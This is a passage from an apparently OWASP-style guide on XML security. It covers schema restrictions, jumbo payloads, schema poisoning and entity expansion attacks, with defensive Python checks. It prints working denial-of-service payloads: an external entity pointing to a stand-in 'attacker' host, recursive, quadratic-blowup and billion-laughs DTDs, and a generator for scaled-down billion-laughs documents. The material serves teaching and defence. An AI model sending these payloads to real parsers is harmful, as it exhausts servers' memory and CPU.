    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where valid values must have one exact length (for example, 8 characters), the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; restriction can be used instead:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values from &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; through &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; that match the pattern exactly will be allowed as values for an SSN.&lt;br /&gt;
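&lt;br /&gt;
XML Schema patterns implicitly match the whole value, so an application-side equivalent must anchor the expression as well. The following is a minimal Python sketch, where &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt; is a hypothetical helper name:&lt;br /&gt;

```python
import re

# Same expression as the schema; [0-9] avoids matching non-ASCII digits.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(value):
    """Return True only when the entire value matches the SSN pattern."""
    # fullmatch anchors both ends; match() alone would accept trailing data.
    return SSN_PATTERN.fullmatch(value) is not None
```

Using &amp;lt;tt&amp;gt;fullmatch&amp;lt;/tt&amp;gt; rather than &amp;lt;tt&amp;gt;match&amp;lt;/tt&amp;gt; keeps values with extra leading or trailing characters from being accepted.&lt;br /&gt;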
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components (available in XML Schema 1.1) constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Leaving the maximum number of occurrences undefined can be costly: the application must then cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
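&lt;br /&gt;
Where the schema cannot be changed, a limit can also be enforced while parsing. The following Python sketch counts &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements as they are streamed and stops at a threshold; the limit of 1000 and the function name &amp;lt;tt&amp;gt;count_buys&amp;lt;/tt&amp;gt; are assumptions chosen for illustration:&lt;br /&gt;

```python
import io
import xml.etree.ElementTree as ET

MAX_BUY_ELEMENTS = 1000  # assumed limit, tune to the application


def count_buys(xml_bytes, limit=MAX_BUY_ELEMENTS):
    """Stream the document and fail once more than `limit` buy elements appear."""
    count = 0
    for _event, elem in ET.iterparse(io.BytesIO(xml_bytes), events=("end",)):
        if elem.tag == "buy":
            count += 1
            if count > limit:
                raise ValueError("too many buy elements")
            elem.clear()  # drop the children of the element already handled
    return count
```

Because the check runs during parsing, processing stops as soon as the threshold is crossed rather than after the whole document has been read.&lt;br /&gt;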
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. An embedded schema therefore serves only as a suggestion of the expected document structure; to be used safely, there must be a way to check its integrity.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
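&lt;br /&gt;
A permission problem of this kind can be detected with a simple check before a schema file is loaded. The following Python sketch assumes a POSIX file system; &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; is a hypothetical helper name:&lt;br /&gt;

```python
import os
import stat


def is_world_writable(path):
    """Return True when users outside the owner and group can write the file."""
    mode = os.stat(path).st_mode
    # S_IWOTH is the write bit for "other", the last rw- in -rw-rw-rw-.
    return bool(mode & stat.S_IWOTH)
```

An application could refuse to load a schema for which this check returns true. The check covers only the file itself; the permissions of its parent directories matter as well.&lt;br /&gt;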
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker able to sniff the connection could modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
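&lt;br /&gt;
One possible mitigation for remotely hosted schemas, sketched here as an assumption rather than as a prescribed method, is to pin a known-good digest of the schema and refuse content that does not match it. The function name &amp;lt;tt&amp;gt;schema_is_unmodified&amp;lt;/tt&amp;gt; and the idea of storing the pinned digest alongside the application are hypothetical:&lt;br /&gt;

```python
import hashlib
import hmac


def schema_is_unmodified(schema_bytes, expected_sha256_hex):
    """Compare the SHA-256 digest of a fetched schema with a pinned value."""
    actual = hashlib.sha256(schema_bytes).hexdigest()
    # compare_digest avoids leaking the position of the first mismatch.
    return hmac.compare_digest(actual, expected_sha256_hex.lower())
```

The pinned digest has to be recorded from a trusted copy of the schema and updated whenever the schema legitimately changes.&lt;br /&gt;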
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the DTD describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
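&lt;br /&gt;
The XML specification treats such a loop as a well-formedness error (an entity must not reference itself, directly or indirectly), so a conforming parser is expected to reject the document instead of looping. The following Python sketch checks this with the standard-library parser; &amp;lt;tt&amp;gt;parses_cleanly&amp;lt;/tt&amp;gt; is a hypothetical helper name, and the behavior of other parsers should be verified separately:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

# The circular definition from the example above.
RECURSIVE_DOC = """<!DOCTYPE A [
 <!ELEMENT A ANY>
 <!ENTITY A "<A>&B;</A>">
 <!ENTITY B "&A;">
]>
<A>&A;</A>"""


def parses_cleanly(xml_text):
    """Return True if the standard-library parser accepts the document."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        return False
    return True
```

A parser that returns normally for &amp;lt;tt&amp;gt;RECURSIVE_DOC&amp;lt;/tt&amp;gt;, or that never returns at all, deserves closer inspection.&lt;br /&gt;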
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n&amp;lt;sup&amp;gt;2&amp;lt;/sup&amp;gt;)). The following attack expands to 100,000*100,000 = 10&amp;lt;sup&amp;gt;10&amp;lt;/sup&amp;gt; characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
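&lt;br /&gt;
The amplification can be estimated with simple arithmetic. The following Python sketch (the function name is hypothetical, and markup overhead such as the DOCTYPE and the root tags is ignored) compares the approximate size of the document sent with the size of the expanded content:&lt;br /&gt;

```python
def quadratic_blowup_sizes(entity_length, reference_count, entity_name="A"):
    """Return (approximate document size, expanded size) in characters."""
    reference = "&" + entity_name + ";"
    # The attacker sends the entity value once plus one short reference per use.
    document_size = entity_length + reference_count * len(reference)
    # The parser materializes the full entity value for every reference.
    expanded_size = entity_length * reference_count
    return document_size, expanded_size
```

For the example above, roughly 400,000 characters of input expand to 10,000,000,000 characters.&lt;br /&gt;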
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by expanding the 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 (3,000,000,000) characters, which could make the parser crash. &lt;br /&gt;
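&lt;br /&gt;
The growth can be observed safely with a scaled-down document. The following Python sketch builds the same structure with a configurable number of levels and measures the expanded text using the standard-library parser; &amp;lt;tt&amp;gt;laughs_document&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;expanded_length&amp;lt;/tt&amp;gt; are hypothetical names, and the sketch assumes a parser that expands internal entities, as CPython's ElementTree does:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET


def laughs_document(levels):
    """Build a scaled-down document in the style of the example above."""
    lines = ["<!DOCTYPE root [", '<!ENTITY LOL "LOL">']
    previous = "LOL"
    for level in range(1, levels + 1):
        name = "LOL%d" % level
        # Each level refers ten times to the level below it.
        lines.append('<!ENTITY %s "%s">' % (name, ("&%s;" % previous) * 10))
        previous = name
    lines.append("]>")
    lines.append("<root>&%s;</root>" % previous)
    return "\n".join(lines)


def expanded_length(levels):
    """Parse the document and return the length of the expanded text."""
    return len(ET.fromstring(laughs_document(levels)).text)
```

Three levels already turn a document of a few hundred characters into 3,000 characters of text. Each additional level multiplies the result by 10, so the nine levels of the original example should not be tried against a production parser.&lt;br /&gt;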
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE soap:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT soap:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST soap:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
